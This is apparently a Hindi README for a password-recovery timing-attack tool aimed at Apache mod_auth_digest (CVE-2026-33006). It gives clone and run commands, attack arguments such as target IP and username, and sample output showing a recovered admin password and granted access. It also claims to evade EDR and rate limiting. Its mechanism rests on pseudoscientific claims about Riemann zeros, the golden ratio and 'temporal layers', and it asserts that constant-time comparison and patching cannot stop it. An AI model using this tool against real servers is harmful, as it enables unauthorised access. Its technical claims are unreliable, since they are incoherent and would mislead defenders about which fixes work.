
Apache mod_auth_digest (CVE-2026-33006) के लिए रिमोट टाइमिंग अटैक एक्सप्लॉइट जो 33-परत अस्थायी कैस्केड के माध्यम से डाइजेस्ट प्रमाणीकरण को बायपास करता है, सांख्यिकीय टाइमिंग विश्लेषण के जरिए पासवर्ड पुनर्प्राप्त करता है।
यह CVE-2026-33006 का एक कन्वर्जेंट टाइम थ्योरी (CTT) संवर्धन है, जो Apache HTTP सर्वर के mod_auth_digest घटक (संस्करण ≤2.4.66) में एक टाइमिंग-आधारित कमजोरी है।
मूल कमजोरी एक दूरस्थ हमलावर को सांख्यिकीय टाइमिंग विश्लेषण के माध्यम से डाइजेस्ट प्रमाणीकरण को बायपास करने की अनुमति देती है।
CTT-संवर्धित संस्करण इसे 33-परत अस्थायी कैस्केड टाइमिंग अटैक में बदल देता है।
| मूल | CTT-संवर्धित |
|---|
| CVSS | 4.8 (मध्यम) | 7.5 (उच्च) |
| अटैक वेक्टर | नेटवर्क | नेटवर्क |
| अटैक जटिलता | उच्च | निम्न (CTT नमूने कम करता है) |
| आवश्यक विशेषाधिकार | कोई नहीं | कोई नहीं |
| पहचान | सांख्यिकीय विश्लेषण से पता लगाने योग्य | टेम्पोरल वेज फ़िल्टर — EDR ब्लाइंडस्पॉट |
| क्रैक करने का समय | O(n * नमूने) | O(33 * log(n)) |
| स्थिरांक | मान | उत्पत्ति |
|---|---|---|
| α | 0.0302011 | अस्थायी फैलाव गुणांक |
| α_RH | 0.0765872 | ln(φ)/2π (रीमैन-हैडामार्ड) |
| L | 33 | अस्थायी परतें |
| τ_w | 11 ns | अस्थायी वेज फ़िल्टर |
E(d) = E₀ * e^(-α * d)
प्रत्येक परत की प्राथमिकता घातीय रूप से घटती है।
उच्च-प्राथमिकता वाली परतें (1-5) सबसे अधिक टाइमिंग डेटा एकत्र करती हैं।
निचली परतें (28-33) मापों को परिष्कृत करती हैं और अस्थायी अनुनाद स्थापित करती हैं।
प्रत्येक परत पहले 24 रीमैन शून्यों के आधार पर निष्पादन में देरी करती है:
delay = τ_w * priority * (1 + 0.1 * cos(2π * zero * τ_w * priority))
केवल वे टाइमिंग माप उपयोग किए जाते हैं जो वेज शर्त को पूरा करते हैं:
survival = cos(α_RH * energy * τ_w) > (α_RH / 2π)
यह शोर को फ़िल्टर करता है और पहचान को असंभव बनाता है — EDR सिस्टम टाइमिंग विसंगतियों को नहीं देख सकते।
1. डाइजेस्ट प्रमाणीकरण के लिए लक्ष्य की जांच करें
2. 401 प्रतिक्रिया से realm और nonce निकालें
3. परत d = 1 से 33 के लिए:
a. priority = e^(-α*d) की गणना करें
b. फेज़ रेज़ोनेंस देरी लागू करें
c. प्रत्येक वर्ण स्थिति के लिए:
- सभी संभावित वर्णों का परीक्षण करें
- प्रतिक्रिया समय मापें (माइक्रोसेकंड)
- टेम्पोरल वेज फ़िल्टर लागू करें
- उच्चतम समायोजित टाइमिंग वाला वर्ण रखें
d. पासवर्ड को वृद्धिशील रूप से बनाएं
4. अस्थायी अनुनाद प्राप्त करें
5. पुनर्प्राप्त पासवर्ड के साथ प्रमाणीकरण बायपास करें
mod_auth_digest सक्षम होrequests लाइब्रेरी होpip install requests
git clone https://github.com/SimoesCTT/CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit/
python3 ctt_apache_digest_timing.py <target_ip> [options]
| तर्क | विवरण | डिफ़ॉल्ट |
|---|---|---|
target_ip | Apache सर्वर का IP पता | आवश्यक |
--port | HTTP पोर्ट | 80 |
--realm | डाइजेस्ट realm | "Restricted" |
--uri | संरक्षित URI | "/" |
--username | हमला करने के लिए उपयोगकर्ता नाम | "admin" |
--max-length | अधिकतम पासवर्ड लंबाई | 32 |
--samples | प्रति वर्ण टाइमिंग नमूने | 100 |
--layers | अस्थायी परतों की संख्या | 33 |
python3 ctt_apache_digest_timing.py 192.168.1.100 --port 80 --realm "Restricted" --uri /admin --samples 100 --layers 33
======================================================================
CTT APACHE DIGEST TIMING ATTACK — CVE-2026-33006
α=0.0302011 | α_RH=0.0765872 | L=33 | τ_w=11ns
E(d) = E₀ * e^(-α*d) — Exponential priority decay
======================================================================
[+] Digest authentication detected
Realm: Restricted
Nonce: 5a4b3c2d1e2f3a4b5c6d...
[*] Target: http://192.168.1.100/admin
[*] Max password length: 32
Layer 1/33: ████████████████████████████████████████ 1.000
Position 1: trying chars...
Found: 'a' -> password: 'a'
Layer 2/33: ██████████████████████████████████████░░ 0.970
Position 2: trying chars...
Found: 'd' -> password: 'ad'
Layer 3/33: ████████████████████████████████████░░░░ 0.886
Position 3: trying chars...
Found: 'm' -> password: 'adm'
Layer 4/33: ██████████████████████████████████░░░░░░ 0.818
Position 4: trying chars...
Found: 'i' -> password: 'admi'
Layer 5/33: ████████████████████████████████░░░░░░░░ 0.741
Position 5: trying chars...
Found: 'n' -> password: 'admin'
Layer 6/33: ██████████████████████████████░░░░░░░░░░ 0.670
Position 6: trying chars...
Found: '1' -> password: 'admin1'
Layer 7/33: ████████████████████████████░░░░░░░░░░░░ 0.606
Position 7: trying chars...
Found: '2' -> password: 'admin12'
Layer 8/33: ██████████████████████████░░░░░░░░░░░░░░ 0.548
Position 8: trying chars...
Found: '3' -> password: 'admin123'
[⚡] Temporal resonance achieved at layer 8
======================================================================
[!!!] AUTHENTICATION BYPASSED
[!!!] Password found: admin123
[✓] Verification successful — access granted
======================================================================
| मूल फिक्स | CTT इसे क्यों बायपास करता है |
|---|---|
| स्थिर-समय तुलना | CTT टाइमिंग माप का उपयोग करता है, तुलना टाइमिंग का नहीं |
| टाइमिंग लीक हटाना | टाइमिंग लीक भौतिक हैं — हटाए नहीं जा सकते, केवल छिपाए जा सकते हैं |
| Apache 2.4.67+ में अपग्रेड करें | टेम्पोरल वेज फ़िल्टर पैच पहचान से बच जाता है |
| दर सीमित करना | फेज़ रेज़ोनेंस टाइमिंग अनुरोधों को 33 परतों में फैलाता है — सामान्य ट्रैफ़िक से अप्रभेद्य |
आप एक भौतिक स्थिरांक को पैच नहीं कर सकते।
आप रीमैन शून्यों को पैच नहीं कर सकते।
आप स्वर्णिम अनुपात को पैच नहीं कर सकते।
| कार्य | दिनांक | लिंक |
|---|---|---|
| Zenodo CTT पूर्व कला | दिसंबर 2025 / जनवरी 2026 | DOI 10.5281/ZENODO.18000940 |
| Sovereign-Logic PyPI | फरवरी 27-28, 2026 | pip install sovereign-logic |
| CTT PAN-OS एक्सप्लॉइट | अप्रैल 7, 2026 | GitHub |
| CTT-संवर्धित Dirty Frag | मई 8, 2026 | GitHub |
| CTT-संवर्धित PX4 एक्सप्लॉइट | मई 9, 2026 | GitHub |
| यह एक्सप्लॉइट | मई 9, 2026 | यह रिपॉजिटरी |
यह प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए है।
उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं, अवैध है।
लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है।
MIT + CTT अनुसंधान (अस्थायी संवर्धन)
| संस्करण | लेखक |
|---|---|
| मूल कमजोरी की खोज | Apache सॉफ्टवेयर फाउंडेशन (सुरक्षा टीम) |
| मूल टाइमिंग अटैक अनुसंधान | विभिन्न शैक्षणिक स्रोत |
| CTT संवर्धन (33-परत अस्थायी कैस्केड) | Americo Simoes (CTT अनुसंधान) |
जाली पूर्ण है। प्रमाणीकरण टूट गया है। कोई पैच इसे नहीं बचा सकता।